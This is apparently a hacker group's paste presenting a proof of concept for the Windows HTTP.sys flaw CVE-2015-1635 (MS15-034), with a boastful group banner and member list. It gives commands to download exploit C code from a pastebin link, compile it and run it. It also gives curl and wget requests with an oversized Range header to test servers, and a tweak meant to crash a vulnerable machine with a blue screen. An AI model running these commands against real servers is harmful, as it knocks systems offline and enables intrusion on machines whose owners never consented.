[+] Microsoft Window - HTTP.sys PoC (CVE-2015-1635) [+]

1. We are...
2. _____ _________
3. / _ \ ____ ____ ____ / _____/ ____ ____
4. / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
5. / | \ | ( <_> ) | \/ \ ___/\ \___
6. \____|__ /___| /\____/|___| /_______ /\___ >\___ >
7. \/ \/ \/ \/ \/ \/
8. //Laughing at your security since 2012*
9. =================================================================================================
10. Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - MS08-067 - Hannaichi - ap3x h4x0r -
11. Gh05tFr3ak - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList - AN0NT0XIC - Ny0g3n
12. =================================================================================================
13.  
14. (CVE-2015-1635) Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1,
15. and Windows Server 2012 R2 systems running Microsoft's IIS web server are affected. The component
16. at fault is HTTP.sys, a kernel-level driver that forwards requests for webpages and the like to
17. the user-space server software, and caches static files.
18.  
19.  
20. Microsoft Window - HTTP.sys PoC (MS15-034)
21. http://www.exploit-db.com/exploits/36773/
22.  
23. wget http://pastebin.com/raw.php?i=ypURDPc4 -O HTTPsys.c
24. gcc HTTPsys.c -o HTTPsys
25. ./HTTPsys
26.  
27.  
28.  
29. To check if vuln/exploit using curl:
30. curl -v [ipaddress]/static.png -H "Host: test" -H "Range: bytes=0-18446744073709551615"
31.  
32. Change 0- to 20- to blue-screen-of-death a vulnerable box.
33.  
34.  
35. With Wget:
36. wget -O /dev/null --header="Range: 0-18446744073709551615" http://[ip address]/
37.  
38.  
39.  
40. [+] Sources [+]
41. https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
42. https://support.microsoft.com/en-us/kb/3042553
43. http://www.theregister.co.uk/2015/04/16/http_sys_exploit_wild_ms15_034/
44. http://www.exploit-db.com/exploits/36773/
45. Twitter: @rhcp011235